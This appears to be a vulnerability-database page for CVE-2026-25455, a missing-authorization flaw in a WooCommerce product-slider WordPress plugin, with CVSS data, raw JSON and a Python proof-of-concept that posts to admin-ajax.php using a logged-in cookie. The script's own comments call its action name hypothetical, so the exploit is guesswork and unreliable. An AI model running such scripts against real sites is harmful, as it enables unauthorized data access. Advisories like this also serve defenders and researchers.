Security Vulnerability Report
中文
CVE-2026-25455 CVSS 6.5 MEDIUM

CVE-2026-25455

Published: 2026-03-25 17:16:52
Last Modified: 2026-04-28 02:16:08

Description

Missing Authorization vulnerability in PickPlugins Product Slider for WooCommerce woocommerce-products-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Slider for WooCommerce: from n/a through <= 1.13.61.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PickPlugins Product Slider for WooCommerce <= 1.13.61

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_missing_auth(target_url, cookie): """ PoC for CVE-2026-25455: Missing Authorization in WooCommerce Product Slider """ # The vulnerable endpoint is typically admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload to trigger the vulnerable action. # Note: The specific 'action' parameter depends on the plugin's implementation. # Common vulnerable actions in this plugin involve exporting settings or retrieving data. payload = { "action": "products_slider_get_data" # Hypothetical action name } headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": cookie } try: response = requests.post(ajax_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") # Usage # exploit_missing_auth("http://target-site.com", "wordpress_logged_in_cookie=...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25455", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:51.607", "lastModified": "2026-04-28T02:16:07.800", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PickPlugins Product Slider for WooCommerce woocommerce-products-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Slider for WooCommerce: from n/a through <= 1.13.61."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en PickPlugins Product Slider para WooCommerce woocommerce-products-slider permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Product Slider para WooCommerce: desde n/a hasta &lt;= 1.13.60."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-products-slider/vulnerability/wordpress-product-slider-for-woocommerce-plugin-1-13-60-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}